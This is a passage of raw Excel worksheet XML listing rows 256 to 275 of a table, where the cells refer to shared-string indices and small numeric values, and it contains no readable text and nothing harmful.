        <v>2238</v>
      </c>
      <c r="K256" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L256" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M256" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N256" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O256" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P256" s="12" t="s">
        <v>2239</v>
      </c>
      <c r="Q256" s="12">
        <v>2.4</v>
      </c>
      <c r="R256" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S256" s="12" t="s">
        <v>2240</v>
      </c>
      <c r="T256" s="12" t="s">
        <v>1403</v>
      </c>
      <c r="U256" s="12" t="s">
        <v>2241</v>
      </c>
      <c r="V256" s="12" t="s">
        <v>2242</v>
      </c>
      <c r="W256" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X256" s="12">
        <v>3</v>
      </c>
      <c r="Y256" s="12" t="s">
        <v>2243</v>
      </c>
    </row>
    <row r="257" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A257" s="12">
        <v>961</v>
      </c>
      <c r="B257" s="13" t="s">
        <v>28563</v>
      </c>
      <c r="D257" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F257" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G257" s="12" t="s">
        <v>2244</v>
      </c>
      <c r="H257" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I257" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J257" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K257" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L257" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M257" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N257" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O257" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P257" s="12" t="s">
        <v>2245</v>
      </c>
      <c r="Q257" s="12">
        <v>2.6</v>
      </c>
      <c r="R257" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S257" s="12" t="s">
        <v>2246</v>
      </c>
      <c r="T257" s="12" t="s">
        <v>2247</v>
      </c>
      <c r="U257" s="12" t="s">
        <v>2248</v>
      </c>
      <c r="V257" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W257" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X257" s="12">
        <v>2</v>
      </c>
      <c r="Y257" s="12" t="s">
        <v>2249</v>
      </c>
    </row>
    <row r="258" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A258" s="12">
        <v>962</v>
      </c>
      <c r="B258" s="13" t="s">
        <v>28560</v>
      </c>
      <c r="C258" s="12" t="s">
        <v>29780</v>
      </c>
      <c r="D258" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F258" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G258" s="12" t="s">
        <v>2250</v>
      </c>
      <c r="H258" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I258" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J258" s="12" t="s">
        <v>363</v>
      </c>
      <c r="K258" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L258" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M258" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N258" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O258" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P258" s="12" t="s">
        <v>2251</v>
      </c>
      <c r="Q258" s="12">
        <v>2.5</v>
      </c>
      <c r="R258" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S258" s="12" t="s">
        <v>2252</v>
      </c>
      <c r="T258" s="12" t="s">
        <v>2253</v>
      </c>
      <c r="U258" s="12" t="s">
        <v>2254</v>
      </c>
      <c r="V258" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W258" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X258" s="12">
        <v>2</v>
      </c>
      <c r="Y258" s="12" t="s">
        <v>2255</v>
      </c>
    </row>
    <row r="259" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A259" s="12">
        <v>967</v>
      </c>
      <c r="B259" s="13" t="s">
        <v>28232</v>
      </c>
      <c r="D259" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E259" s="13" t="s">
        <v>31427</v>
      </c>
      <c r="F259" s="12" t="s">
        <v>29728</v>
      </c>
      <c r="G259" s="12" t="s">
        <v>2266</v>
      </c>
      <c r="H259" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I259" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J259" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K259" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L259" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M259" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N259" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O259" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P259" s="12" t="s">
        <v>2267</v>
      </c>
      <c r="Q259" s="12">
        <v>2.6</v>
      </c>
      <c r="R259" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S259" s="12" t="s">
        <v>2268</v>
      </c>
      <c r="T259" s="12" t="s">
        <v>335</v>
      </c>
      <c r="U259" s="12" t="s">
        <v>2269</v>
      </c>
      <c r="V259" s="12" t="s">
        <v>1472</v>
      </c>
      <c r="W259" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X259" s="12">
        <v>21</v>
      </c>
      <c r="Y259" s="12" t="s">
        <v>2270</v>
      </c>
    </row>
    <row r="260" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A260" s="12">
        <v>973</v>
      </c>
      <c r="B260" s="13" t="s">
        <v>28390</v>
      </c>
      <c r="C260" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D260" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E260" s="13" t="s">
        <v>31427</v>
      </c>
      <c r="F260" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G260" s="12" t="s">
        <v>2276</v>
      </c>
      <c r="H260" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I260" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J260" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K260" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L260" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M260" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N260" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O260" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P260" s="12" t="s">
        <v>2157</v>
      </c>
      <c r="Q260" s="12">
        <v>2.6</v>
      </c>
      <c r="R260" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S260" s="12" t="s">
        <v>2277</v>
      </c>
      <c r="T260" s="12" t="s">
        <v>18</v>
      </c>
      <c r="U260" s="12" t="s">
        <v>2278</v>
      </c>
      <c r="V260" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W260" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X260" s="12">
        <v>25</v>
      </c>
      <c r="Y260" s="12" t="s">
        <v>2279</v>
      </c>
    </row>
    <row r="261" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A261" s="12">
        <v>975</v>
      </c>
      <c r="B261" s="13" t="s">
        <v>29779</v>
      </c>
      <c r="C261" s="12" t="s">
        <v>29781</v>
      </c>
      <c r="D261" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F261" s="12" t="s">
        <v>29728</v>
      </c>
      <c r="G261" s="12" t="s">
        <v>2280</v>
      </c>
      <c r="H261" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I261" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J261" s="12" t="s">
        <v>129</v>
      </c>
      <c r="K261" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L261" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M261" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N261" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O261" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P261" s="12" t="s">
        <v>2157</v>
      </c>
      <c r="Q261" s="12">
        <v>2.6</v>
      </c>
      <c r="R261" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S261" s="12" t="s">
        <v>2281</v>
      </c>
      <c r="T261" s="12" t="s">
        <v>2273</v>
      </c>
      <c r="U261" s="12" t="s">
        <v>2282</v>
      </c>
      <c r="V261" s="12" t="s">
        <v>130</v>
      </c>
      <c r="W261" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X261" s="12">
        <v>5</v>
      </c>
      <c r="Y261" s="12" t="s">
        <v>2283</v>
      </c>
    </row>
    <row r="262" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A262" s="12">
        <v>976</v>
      </c>
      <c r="B262" s="13" t="s">
        <v>28558</v>
      </c>
      <c r="C262" s="12" t="s">
        <v>28565</v>
      </c>
      <c r="D262" s="12" t="s">
        <v>28527</v>
      </c>
      <c r="E262" s="13" t="s">
        <v>31427</v>
      </c>
      <c r="F262" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G262" s="12" t="s">
        <v>28564</v>
      </c>
      <c r="H262" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I262" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J262" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K262" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L262" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M262" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N262" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O262" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P262" s="12" t="s">
        <v>2284</v>
      </c>
      <c r="Q262" s="12">
        <v>2.6</v>
      </c>
      <c r="R262" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S262" s="12" t="s">
        <v>2285</v>
      </c>
      <c r="T262" s="12" t="s">
        <v>2089</v>
      </c>
      <c r="U262" s="12" t="s">
        <v>2286</v>
      </c>
      <c r="V262" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W262" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X262" s="12">
        <v>13</v>
      </c>
      <c r="Y262" s="12" t="s">
        <v>2287</v>
      </c>
    </row>
    <row r="263" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A263" s="12">
        <v>982</v>
      </c>
      <c r="B263" s="13" t="s">
        <v>28511</v>
      </c>
      <c r="D263" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E263" s="13" t="s">
        <v>31427</v>
      </c>
      <c r="F263" s="12" t="s">
        <v>29728</v>
      </c>
      <c r="G263" s="12" t="s">
        <v>2289</v>
      </c>
      <c r="H263" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I263" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J263" s="12" t="s">
        <v>403</v>
      </c>
      <c r="K263" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L263" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M263" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N263" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O263" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P263" s="12" t="s">
        <v>2290</v>
      </c>
      <c r="Q263" s="12">
        <v>2.6</v>
      </c>
      <c r="R263" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S263" s="12" t="s">
        <v>2291</v>
      </c>
      <c r="T263" s="12" t="s">
        <v>2292</v>
      </c>
      <c r="U263" s="12" t="s">
        <v>2293</v>
      </c>
      <c r="V263" s="12" t="s">
        <v>411</v>
      </c>
      <c r="W263" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X263" s="12">
        <v>15</v>
      </c>
      <c r="Y263" s="12" t="s">
        <v>2294</v>
      </c>
    </row>
    <row r="264" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A264" s="12">
        <v>987</v>
      </c>
      <c r="B264" s="13" t="s">
        <v>28566</v>
      </c>
      <c r="D264" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F264" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G264" s="12" t="s">
        <v>2307</v>
      </c>
      <c r="H264" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I264" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J264" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K264" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L264" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M264" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N264" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O264" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P264" s="12" t="s">
        <v>2308</v>
      </c>
      <c r="Q264" s="12">
        <v>2.6</v>
      </c>
      <c r="R264" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S264" s="12" t="s">
        <v>2309</v>
      </c>
      <c r="T264" s="12" t="s">
        <v>48</v>
      </c>
      <c r="U264" s="12" t="s">
        <v>2310</v>
      </c>
      <c r="V264" s="12" t="s">
        <v>411</v>
      </c>
      <c r="W264" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X264" s="12">
        <v>7</v>
      </c>
      <c r="Y264" s="12" t="s">
        <v>2311</v>
      </c>
    </row>
    <row r="265" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A265" s="12">
        <v>989</v>
      </c>
      <c r="B265" s="13" t="s">
        <v>28259</v>
      </c>
      <c r="C265" s="12" t="s">
        <v>28568</v>
      </c>
      <c r="D265" s="12" t="s">
        <v>28541</v>
      </c>
      <c r="F265" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G265" s="12" t="s">
        <v>28567</v>
      </c>
      <c r="H265" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I265" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J265" s="12" t="s">
        <v>1873</v>
      </c>
      <c r="K265" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L265" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M265" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N265" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O265" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P265" s="12" t="s">
        <v>2157</v>
      </c>
      <c r="Q265" s="12">
        <v>2.6</v>
      </c>
      <c r="R265" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S265" s="12" t="s">
        <v>2312</v>
      </c>
      <c r="T265" s="12" t="s">
        <v>1149</v>
      </c>
      <c r="U265" s="12" t="s">
        <v>2313</v>
      </c>
      <c r="V265" s="12" t="s">
        <v>2314</v>
      </c>
      <c r="W265" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X265" s="12">
        <v>17</v>
      </c>
      <c r="Y265" s="12" t="s">
        <v>2315</v>
      </c>
    </row>
    <row r="266" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A266" s="12">
        <v>990</v>
      </c>
      <c r="B266" s="13" t="s">
        <v>28390</v>
      </c>
      <c r="C266" s="12" t="s">
        <v>28569</v>
      </c>
      <c r="D266" s="12" t="s">
        <v>28570</v>
      </c>
      <c r="F266" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G266" s="12" t="s">
        <v>2316</v>
      </c>
      <c r="H266" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I266" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J266" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K266" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L266" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M266" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N266" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O266" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P266" s="12" t="s">
        <v>2021</v>
      </c>
      <c r="Q266" s="12">
        <v>2.5</v>
      </c>
      <c r="R266" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S266" s="12" t="s">
        <v>2317</v>
      </c>
      <c r="T266" s="12" t="s">
        <v>2318</v>
      </c>
      <c r="U266" s="12" t="s">
        <v>2319</v>
      </c>
      <c r="V266" s="12" t="s">
        <v>114</v>
      </c>
      <c r="W266" s="12">
        <v>1207</v>
      </c>
      <c r="X266" s="12">
        <v>6</v>
      </c>
      <c r="Y266" s="12" t="s">
        <v>2320</v>
      </c>
    </row>
    <row r="267" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A267" s="12">
        <v>991</v>
      </c>
      <c r="B267" s="13" t="s">
        <v>28232</v>
      </c>
      <c r="D267" s="12" t="s">
        <v>28527</v>
      </c>
      <c r="E267" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F267" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G267" s="12" t="s">
        <v>2321</v>
      </c>
      <c r="H267" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I267" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J267" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K267" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L267" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M267" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N267" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O267" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P267" s="12" t="s">
        <v>2157</v>
      </c>
      <c r="Q267" s="12">
        <v>2.6</v>
      </c>
      <c r="R267" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S267" s="12" t="s">
        <v>2322</v>
      </c>
      <c r="T267" s="12" t="s">
        <v>2323</v>
      </c>
      <c r="U267" s="12" t="s">
        <v>2324</v>
      </c>
      <c r="V267" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W267" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X267" s="12">
        <v>4</v>
      </c>
      <c r="Y267" s="12" t="s">
        <v>2325</v>
      </c>
    </row>
    <row r="268" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A268" s="12">
        <v>1000</v>
      </c>
      <c r="B268" s="13" t="s">
        <v>29785</v>
      </c>
      <c r="C268" s="12" t="s">
        <v>29806</v>
      </c>
      <c r="D268" s="12" t="s">
        <v>28571</v>
      </c>
      <c r="E268" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F268" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G268" s="12" t="s">
        <v>2337</v>
      </c>
      <c r="H268" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I268" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J268" s="12" t="s">
        <v>166</v>
      </c>
      <c r="K268" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L268" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M268" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N268" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O268" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P268" s="12" t="s">
        <v>2290</v>
      </c>
      <c r="Q268" s="12">
        <v>2.6</v>
      </c>
      <c r="R268" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S268" s="12" t="s">
        <v>2338</v>
      </c>
      <c r="T268" s="12" t="s">
        <v>2339</v>
      </c>
      <c r="U268" s="12" t="s">
        <v>2340</v>
      </c>
      <c r="V268" s="12" t="s">
        <v>167</v>
      </c>
      <c r="W268" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X268" s="12">
        <v>3</v>
      </c>
      <c r="Y268" s="12" t="s">
        <v>2341</v>
      </c>
    </row>
    <row r="269" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A269" s="12">
        <v>1003</v>
      </c>
      <c r="B269" s="13" t="s">
        <v>28232</v>
      </c>
      <c r="D269" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F269" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G269" s="12" t="s">
        <v>2342</v>
      </c>
      <c r="H269" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I269" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J269" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K269" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L269" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M269" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N269" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O269" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P269" s="12" t="s">
        <v>2290</v>
      </c>
      <c r="Q269" s="12">
        <v>2.6</v>
      </c>
      <c r="R269" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S269" s="12" t="s">
        <v>2343</v>
      </c>
      <c r="T269" s="12" t="s">
        <v>1205</v>
      </c>
      <c r="U269" s="12" t="s">
        <v>2344</v>
      </c>
      <c r="V269" s="12" t="s">
        <v>202</v>
      </c>
      <c r="W269" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X269" s="12">
        <v>2</v>
      </c>
      <c r="Y269" s="12" t="s">
        <v>2345</v>
      </c>
    </row>
    <row r="270" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A270" s="12">
        <v>1005</v>
      </c>
      <c r="B270" s="13" t="s">
        <v>28390</v>
      </c>
      <c r="C270" s="12" t="s">
        <v>28572</v>
      </c>
      <c r="D270" s="12" t="s">
        <v>28550</v>
      </c>
      <c r="F270" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G270" s="12" t="s">
        <v>2346</v>
      </c>
      <c r="H270" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I270" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J270" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K270" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L270" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M270" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N270" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O270" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P270" s="12" t="s">
        <v>2347</v>
      </c>
      <c r="Q270" s="12">
        <v>2.6</v>
      </c>
      <c r="R270" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S270" s="12" t="s">
        <v>2348</v>
      </c>
      <c r="T270" s="12" t="s">
        <v>2349</v>
      </c>
      <c r="U270" s="12" t="s">
        <v>2350</v>
      </c>
      <c r="V270" s="12" t="s">
        <v>114</v>
      </c>
      <c r="W270" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X270" s="12">
        <v>3</v>
      </c>
      <c r="Y270" s="12" t="s">
        <v>2351</v>
      </c>
    </row>
    <row r="271" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A271" s="12">
        <v>1006</v>
      </c>
      <c r="B271" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D271" s="12" t="s">
        <v>28585</v>
      </c>
      <c r="E271" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F271" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G271" s="12" t="s">
        <v>2352</v>
      </c>
      <c r="H271" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I271" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J271" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K271" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L271" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M271" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N271" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O271" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P271" s="12" t="s">
        <v>2353</v>
      </c>
      <c r="Q271" s="12">
        <v>2.6</v>
      </c>
      <c r="R271" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S271" s="12" t="s">
        <v>2354</v>
      </c>
      <c r="T271" s="12" t="s">
        <v>2355</v>
      </c>
      <c r="U271" s="12" t="s">
        <v>2356</v>
      </c>
      <c r="V271" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W271" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X271" s="12">
        <v>4</v>
      </c>
      <c r="Y271" s="12" t="s">
        <v>2357</v>
      </c>
    </row>
    <row r="272" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A272" s="12">
        <v>1027</v>
      </c>
      <c r="B272" s="12" t="s">
        <v>28573</v>
      </c>
      <c r="C272" s="12" t="s">
        <v>28574</v>
      </c>
      <c r="D272" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F272" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G272" s="12" t="s">
        <v>2369</v>
      </c>
      <c r="H272" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I272" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J272" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K272" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L272" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M272" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N272" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O272" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P272" s="12" t="s">
        <v>2370</v>
      </c>
      <c r="Q272" s="12">
        <v>2.6</v>
      </c>
      <c r="R272" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S272" s="12" t="s">
        <v>2371</v>
      </c>
      <c r="T272" s="12" t="s">
        <v>2372</v>
      </c>
      <c r="U272" s="12" t="s">
        <v>2373</v>
      </c>
      <c r="V272" s="12" t="s">
        <v>202</v>
      </c>
      <c r="W272" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X272" s="12">
        <v>7</v>
      </c>
      <c r="Y272" s="12" t="s">
        <v>2374</v>
      </c>
    </row>
    <row r="273" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A273" s="12">
        <v>1029</v>
      </c>
      <c r="B273" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D273" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F273" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G273" s="12" t="s">
        <v>28575</v>
      </c>
      <c r="H273" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I273" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J273" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K273" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L273" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M273" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N273" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O273" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P273" s="12" t="s">
        <v>2375</v>
      </c>
      <c r="Q273" s="12">
        <v>2.6</v>
      </c>
      <c r="R273" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S273" s="12" t="s">
        <v>2376</v>
      </c>
      <c r="T273" s="12" t="s">
        <v>112</v>
      </c>
      <c r="U273" s="12" t="s">
        <v>2377</v>
      </c>
      <c r="V273" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W273" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X273" s="12">
        <v>1</v>
      </c>
      <c r="Y273" s="12" t="s">
        <v>2378</v>
      </c>
    </row>
    <row r="274" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A274" s="12">
        <v>1033</v>
      </c>
      <c r="B274" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D274" s="12" t="s">
        <v>28576</v>
      </c>
      <c r="E274" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F274" s="12" t="s">
        <v>29734</v>
      </c>
      <c r="G274" s="12" t="s">
        <v>2380</v>
      </c>
      <c r="H274" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I274" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J274" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K274" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L274" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M274" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N274" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O274" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P274" s="12" t="s">
        <v>2381</v>
      </c>
      <c r="Q274" s="12">
        <v>2.6</v>
      </c>
      <c r="R274" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S274" s="12" t="s">
        <v>2382</v>
      </c>
      <c r="T274" s="12" t="s">
        <v>2089</v>
      </c>
      <c r="U274" s="12" t="s">
        <v>2383</v>
      </c>
      <c r="V274" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W274" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X274" s="12">
        <v>5</v>
      </c>
      <c r="Y274" s="12" t="s">
        <v>2384</v>
      </c>
    </row>
    <row r="275" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A275" s="12">
        <v>1038</v>
      </c>
      <c r="B275" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C275" s="12" t="s">
        <v>28586</v>
      </c>
      <c r="D275" s="12" t="s">
        <v>28587</v>
      </c>
      <c r="E275" s="12" t="s">
        <v>31427</v>
      </c>
